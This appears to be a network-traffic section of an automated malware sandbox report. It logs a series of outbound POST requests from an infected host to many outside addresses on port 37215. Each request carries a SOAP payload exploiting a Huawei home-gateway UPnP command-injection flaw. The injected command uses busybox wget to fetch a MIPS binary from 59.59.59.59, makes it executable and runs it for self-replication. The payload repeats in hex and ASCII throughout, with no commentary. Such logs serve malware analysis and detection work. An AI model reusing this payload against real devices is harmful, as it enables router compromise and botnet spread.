                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          392192.168.2.1539042197.17.198.13537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.559339046 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          393192.168.2.1534512157.205.44.7837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.559437990 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          394192.168.2.1536666171.193.211.10337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.559731960 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          395192.168.2.1558422157.25.33.18137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.559811115 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          396192.168.2.153723041.111.87.17037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.559827089 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          397192.168.2.1546936157.5.253.21737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.559900999 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          398192.168.2.1546438157.44.17.8337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.560019016 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          399192.168.2.153798241.171.179.14237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.560048103 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          400192.168.2.1558498157.231.239.18137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.560060978 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          401192.168.2.1535824197.199.9.12437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.560098886 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 